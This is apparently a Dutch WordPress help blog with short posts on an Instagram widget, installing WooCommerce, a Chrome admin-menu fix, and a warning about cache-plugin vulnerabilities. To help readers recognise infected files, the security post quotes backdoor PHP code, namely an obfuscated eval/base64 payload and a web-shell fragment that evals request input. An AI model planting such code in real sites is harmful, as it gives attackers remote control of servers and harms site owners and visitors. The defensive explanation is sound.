Hoe maak ik een Instragram slider widget?

Om een widget te maken die je laatste Instagram foto’s toont kan je de plug-in ‘Instagram Slider Widget’ gebruiken. Zo installeer je hem:

  1. Ga naar Plug-ins > Nieuwe Plug-in
  2. Zoek op Instagram Slider Widget door jetonr en installeer hem
  3. Ga naar Weergave > Widgets
  4. Zoek de “Instagram Slider” en sleep hem naar de gewenste sidebar (meestal Main)
  5. Vul je gebruikersnaam in en sla het op

Als het goed is staat er nu een Instagram Slider op in je sidebar!

Staat deze er niet? Dan is je Instagram profiel waarschijnlijk privé en dan werkt het niet.

Continue Reading “Hoe maak ik een Instragram slider widget?”

Hoe kan ik WooCommerce installeren?

Om WooCommerce te installeren in je WordPress website heb je een beheerdersaccount nodig voor de wp-admin.

Eenmaal ingelogd ga je naar Plugins > Nieuwe Plugin

Rechtsboven kan je nu zoeken naar een Plugin. Vul hier in “WooCommerce”. Het eerste resultaat is als het goed is de juiste. “WooCommerce” is van “WooThemes”.

Klik op “Nu installeren”. Na de installatie krijg je boven in nog een paars vak met daarin een knop “Installeer standaard webshop pagina’s”.

In principe is je WooCommerce winkel nu klaar voor gebruik. Je kan nu producten aanmaken onder Producten. De instellingen van je webwinkel kan je beheren onder Winkel > Instellingen.

Optioneel kan je nog de WooCommerce (nl) plug-in installeren van Pronamic. Deze biedt wat standaard instellingen en vertalingen die van toepassing zijn als je een Nederlandse webwinkel wil openen.

 

WP-admin menu bug in Chrome

Ook last van het probleem in Chrome 45 dat het admin menu begint te flippen? Je kan het oplossen door het menu in- en uit te vouwen.

Als je het probleem permanent wil oplossen kan je mijn eerste officële plug-in installeren. Hij voegt alleen maar deze regel toe maar het lost wel het probleem op:

if ( strpos( $_SERVER['HTTP_USER_AGENT'], 'Chrome/45' ) !== false ) add_action('admin_head', create_function('', "echo \"<script type='text/javascript'>jQuery(window).load(function(){jQuery('#adminmenuwrap').hide().show(0);});</script>\";") );

De plug-in vind je hier.

Wil je weten hoe je een plug-in moet installeren? Kijk dan in de handleiding: Hoofdstuk 4: Plug-ins installeren

Belangrijk: Update W3 Total cache of WP Super Cache

Via dit artikel werden we gewezen op de kwetsbaarheden die zijn gevonden in de twee grootste cache plugins:

  • W3 Total cache
  • WP Super Cache

In beide plugins was het mogelijk om PHP code uit te voeren via de standaard reageer functionaliteit. Iets waarmee kwaadwillenden eenvoudig backdoor scripts (of zogenoemde shells) kunnen plaatsen waarna ze vrije toegang hebben tot alle bestanden in je webhostingaccount.

Waarom zouden ze mij willen hacken?

In de meeste gevallen is een dergelijke hack niets persoonlijks. Vaak kijken ze niet eens naar de bestanden omdat het proberen en inbreken volledig geautomatiseerd is.

Maar wat doen ze eigenlijk zodra ze toegang hebben? Een paar opties:

Spam versturen

Spam versturen is nog steeds lucratief. Als ze jouw webhosting accountje met goede reputatie kunnen gebruiken om tien of honderdduizenden berichten te sturen, dan doen ze dat maar al te graag.

Virus verspreiden

Door een JavaScript-code in te brengen in jouw html/php pagina’s worden al jouw bezoekers “onder water” doorgestuurd naar een malafide code die ergens anders staat. Door deze weer up te daten kunnen ze gerichte malware of virussen proberen te injecteren.

Onderdeel van een Botnet maken

Je hoort de laatste tijd veel nieuws over DDoS-aanvallen. Dit zijn aanvallen die komen vanaf botnets. Het kan zijn dat jouw hostingaccount ook onderdeel uitmaakt van zo’n Botnet en deel uit maakt van zo’n DDoS aanval.

Backdoors inbouwen

Ze bouwen vaak ook een extra backdoor in, dus een extra achterdeur. Als jij denkt dat je alles hebt opgeruimd hebben ze vaak nog een deur op een kier gezet om dezelfde trucjes gewoon weer uit te halen. Dus dan begint het weer met het plaatsen van een shell, en daarna kiezen ze weer één of meerdere van bovenstaande opties. Wat ik vaak zie is dat de standaard COPYWRIGHT.PHP van WordPress wordt aangepast naar een backdoor script.

Ik gebruik één van de twee cache plugins. En nu?

Updaten! Zo snel mogelijk een update doen en anders die plugins helemaal uitzetten. Het is een kwestie van tijd voordat je WordPress installatie ook gehackt wordt.

Hoe kom ik er achter of mijn WordPress installatie geïnfecteerd is?

Als je inzicht hebt in je reacties, en je hebt niets vreemds gezien, dan is er waarschijnlijk ook niets aan de hand.

Als je in de mappen van je WordPress installatie kijkt kan je vaak aan de data al zien of er gerommeld is. Als alle data nog afstammen van het moment dat je WordPress hebt geïnstalleerd of hebt geupdate, dan is er niets aan de hand. Maar als je ziet dat belangrijke bestanden op de datum van vandaag of gisteren staan, zonder dat je zelf iets hebt gedaan, dan is er iets mis.

Open de .php bestanden met zo’n afwijkende datum en zoek naar lange onleesbare codes, zoals:

eval(gzinflate(base64_decode('FJzHkqPatkU/550IGnjXxHvv6bzAe0iE5+svFVGtKqXMZq05x1ClVJ3Z+F/zdnM9Znv1X55tFYH9f1kVS1n993+iiorDYWviEIA4GgnspGTd37DP+uVE1IvRZQH/8lxft4uqCHokTtUAUBBGsDucAXI8n7f0Gp2sYXkKYBkAcGBdZhWZlDcBIvb5oXFZ/s7p5ksrXsZ29EcHiFDq/lMgav4VLeqqTF6tPtzIWBvTXvgTNKjXFgqmoXa80E4ZCk9xbvNPzhDledODU1PHct9J6vOtiK6fgdTbBmK3E47Aa/URB24tldhtEe46TjqpMb4DBGXMo29rpii3qhDTZIpMcB1xBok332BjccfPXq0QsZU/g4eapBxT5git1rGdKtwf1rt9OOicc/hTlpeFmEjRRkWGWTJTkCol0X4AuwJSfFhtfP5dOgn561il+wkzkqCG9dfT9zqc274veIeSd41CxUIvH')));

 $dcawl = "d410cf2db81b72a00493e14ec542b3f"; if(isset($_REQUEST['eujjfr'])) { $eoetbln = $_REQUEST['eujjfr']; eval($eoetbln); exit(); } if(isset($_REQUEST['jqsjw'])) { $zcxdhege = $_REQUEST['sjjcsp']; $ltipnkb = $_REQUEST[

Haal deze codes er uit. Maar nog beter: herinstalleer de bestanden van WordPress via de knop “Opnieuw installeren”.

Er zijn ook mooie plugins ter beveiliging en controle van je WordPress installatie. Bijvoorbeeld BulletProof.

Hoe kan ik WordPress beter beveiligen?

Om je WordPress beter te beveiligen kan je één of meerdere plug-ins installeren.

Bekijk bijvoorbeeld eens naar de plug-in WordFence. Deze plugin beveiligt preventief en houdt iedereen die probeert in te breken buiten de deur. Ook kan hij je gehele WordPress installatie periodiek scannen om zo bijvoorbeeld backdoor shells op te sporen.

Hoe je je WordPress optimaal beveiligt lees je in de Nederlandse WordPress handleiding Hoofdstuk 6: beveiligen.

Hoe importeer ik een XML of CSV feed in WordPress?

Er zijn verschillende plug-ins die CSV of XML feeds kunnen verwerken. Het ligt er maar net aan wat je wensen zijn en waar het precies in moet.

Als je uitgebreide wensen hebt en veel controle over het verwerken van de gegevens wilt, dan raad ik je aan om eens te kijken naar de plugin WP All Importer.

Deze plugin kan werkelijk alles:

Continue Reading “Hoe importeer ik een XML of CSV feed in WordPress?”